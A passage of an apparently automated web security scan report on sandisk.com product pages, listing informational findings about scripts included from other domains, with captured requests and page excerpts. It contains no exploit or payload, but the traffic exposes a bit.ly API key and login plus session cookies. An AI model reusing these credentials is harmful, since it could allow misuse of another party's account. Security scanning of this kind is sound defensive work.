<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Step up to faster shot-to-shot performance, so the shot you want is the shot you...ll get, and capture more video clips on the cards you can count on.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-032G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
ole thing on a super high-capacity, durable SanDisk Ultra.. card. Whether the days are sweltering or frosty, these cards keep up. So you...re ready for more shots and more adventure, anywhere.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
">Are you a weekend warrior? Your next adventure deserves nothing less than a rugged card with enough room to capture the whole weekend...no matter how long it takes to catch the perfect wave.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Mountain biking anyone? Whatever your idea of the perfect Saturday, get a card that can capture the views all day long.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.162. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-sdxc-cards

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-064G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-ultra-sdxc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26557
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Ultra.. SDXC... Card - 64 GB
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-064G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.163. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-gaming-compatibility-pack

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDM2GCP-121-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/gaming-cards/sandisk-gaming-compatibility-pack HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26146
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
td class="two">Moving files from your Memory Stick Micro... (M2...) to your Sony Memory Stick PRO Duo... devices or your personal computer is a snap with the SanDisk Gaming Compatibility pack.
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDM2GCP-121-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.164. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-memory-stick-micro-m2

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-002G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-004G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/gaming-cards/sandisk-memory-stick-micro-m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33654
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">This 16GB SanDisk.. Memory Stick Micro... (M2...) gaming card can keep up with your portable gaming system. Take your favorite movies and games with you wherever you go.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Enjoy more of your favorite games, tunes and photos on your portabe game system wherever life takes you with an 8GB SanDisk.. Memory Stick Micro... (M2...) gaming card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Keep playing on and on! Your portable game system will get the storage it needs with a 4GB SanDisk.. Memory Stick Micro... (M2...) gaming card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Save games and play off the 2GB SanDisk.. Memory Stick Micro... (M2...) gaming card on your portable game system.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.165. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-xbox-360-usb-flash-drive

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZGXB-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZGXB-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/gaming-cards/sandisk-xbox-360-usb-flash-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49443
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
</sup> 16GB USB Flash Drive

<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZGXB-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
</sup> 8GB USB Flash Drive
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZGXB-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.166. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/imaging/sandisk-extreme-sdhc-cards-

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-004G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-008G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-016G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-032G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/imaging/sandisk-extreme-sdhc-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33371
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Perform in extreme conditions, from deserts to glaciers to beaches and back again, on standard high-capacity cards that let you take your shoots to the extreme.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-032G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Whether you...re snapping wedding shots, reunion pictures, or a fast motion sequence, you...ll capture the moment with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-016G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Seize the moment, no matter how long it lasts, with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-008G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more from your advanced camera and capture all your awesome shots with lightning-fast speed.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-004G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.167. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-004G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-032G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/imaging/sandisk-ultra-memory-stick-pro-hg-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35707
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
O-HG Duo... memory card, delivering speed and reliability for fast shot-to-shot performance and top quality video recording at our highest capacity available...made for SONY.. digital cameras.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-032G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
capacity to capture high definition photo and video clips, you can get the shot you want with the 16GB SanDisk Ultra.. Memory Stick PRO-HG Duo... memory card...made for SONY.. digital cameras.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
ot-to-shot performance and top quality video recording, the 8GB SanDisk Ultra.. Memory Stick PRO-HG Duo... memory card was co-invented with SONY for high mega-pixel and high-def SONY products.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Because the shot you want should be the shot you get, step up to the 4GB SanDisk Ultra.. Memory Stick PRO-HG Duo... memory card...made for SONY.. digital cameras.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.168. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-memory-stick-micro-m2

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-002G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-004G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-008G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-016G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33088
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB*mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-008G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card ... and shoot more video on your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone room to capture the moment with a SanDisk 2GB* mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-002G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.169. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-002G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-004G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-008G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-016G-A11M&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33098
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB*mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-008G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card ... and shoot more video on your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone room to capture the moment with a SanDisk 2GB* mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-002G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.170. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-microsdhc

Issue detail

